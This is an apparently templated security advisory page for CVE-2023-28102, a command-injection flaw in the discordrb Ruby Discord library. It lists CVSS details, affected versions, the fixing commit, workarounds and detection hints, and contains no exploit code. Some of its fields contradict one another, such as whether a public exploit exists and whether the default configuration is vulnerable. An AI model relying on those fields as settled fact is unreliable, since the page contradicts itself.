CVE-2023-28102 – This vulnerability in discordrb (a Ruby Discord... (How to Fix)

Q: What is the severity of CVE-2023-28102?

CVE-2023-28102 has a CVSS score of 8.3 (HIGH). This vulnerability in discordrb (a Ruby Discord API library) allows command injection if user-controlled input reaches a specific method. Attackers could execute arbitrary shell commands on the host system. Only applications using discordrb with unsafe user input in the vulnerable method are affected.

📋 TL;DR

This vulnerability in discordrb (a Ruby Discord API library) allows command injection if user-controlled input reaches a specific method. Attackers could execute arbitrary shell commands on the host system. Only applications using discordrb with unsafe user input in the vulnerable method are affected.

💻 Affected Systems

Products:

discordrb

Versions: All versions before commit 91e13043ffa89227c3fcdc3408f06da237d28c95

Operating Systems: All operating systems running Ruby

Default Config Vulnerable: ⚠️ Yes

Notes: The vulnerability requires client applications to call the vulnerable method with user input. The library itself is not directly exploitable without client misuse.

📦 What is this software?

Discordrb by Discordrb Project

View all CVEs affecting Discordrb →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Full compromise of the host system with the privileges of the discordrb process, potentially leading to data theft, ransomware deployment, or complete system takeover.

🟠

Likely Case

Limited command execution within the application's process context, potentially accessing application data or performing lateral movement within the environment.

🟢

If Mitigated

No impact if proper input validation/sanitization is implemented or if the vulnerable method isn't called with user input.

🌐 Internet-Facing: MEDIUM

🏢 Internal Only: LOW

🎯 Exploit Status

Public PoC: ✅ No

Weaponized: UNKNOWN

Unauthenticated Exploit: ✅ No

Complexity: MEDIUM

Exploitation requires the client application to pass unsanitized user input to the vulnerable method. No public exploit code has been released.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Commit 91e13043ffa89227c3fcdc3408f06da237d28c95

Vendor Advisory: https://securitylab.github.com/advisories/GHSL-2022-094_discordrb/

Restart Required: Yes

Instructions:

1. Update discordrb to the patched version from GitHub (no new gem release available). 2. Replace vulnerable encoder.rb with the patched version. 3. Restart the application.

🔧 Temporary Workarounds

Input Validation/Sanitization

all

Implement strict input validation and sanitization for any user input passed to discordrb methods.

Avoid User Input in Vulnerable Method

all

Ensure the vulnerable method is not called with any user-controlled input.

🧯 If You Can't Patch

Implement strict input validation and sanitization for all user inputs passed to discordrb.
Run the discordrb process with minimal privileges (non-root, restricted user account).

🔍 How to Verify

Check if Vulnerable:

Check if your discordrb version is before commit 91e13043ffa. Review application code to see if user input reaches the encoder.rb file methods.

Check Version:

Check Gemfile.lock or run 'gem list discordrb' to see installed version, then compare with GitHub commit history.

Verify Fix Applied:

Verify the discordrb installation uses the patched encoder.rb file from commit 91e13043ffa or later.

📡 Detection & Monitoring

Log Indicators:

Unexpected shell command execution from the discordrb process
Process spawning with unusual arguments

Network Indicators:

Outbound connections from the discordrb process to unexpected destinations

SIEM Query:

Process creation events where parent process is the discordrb application and command line contains suspicious shell metacharacters

📊 Metadata

CVE ID: CVE-2023-28102

CVSS v3 Score: 8.3 (HIGH)

CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H

CWE: CWE-78

Published: March 27, 2023

Last Updated: November 21, 2024

🔗 References

https://github.com/shardlab/discordrb/commit/91e13043ffa89227c3fcdc3408f06da237d28c95 Patch
https://securitylab.github.com/advisories/GHSL-2022-094_discordrb/ Exploit,Third Party Advisory
https://github.com/shardlab/discordrb/commit/91e13043ffa89227c3fcdc3408f06da237d28c95 Patch
https://securitylab.github.com/advisories/GHSL-2022-094_discordrb/ Exploit,Third Party Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2023-28102, you might also want to check these: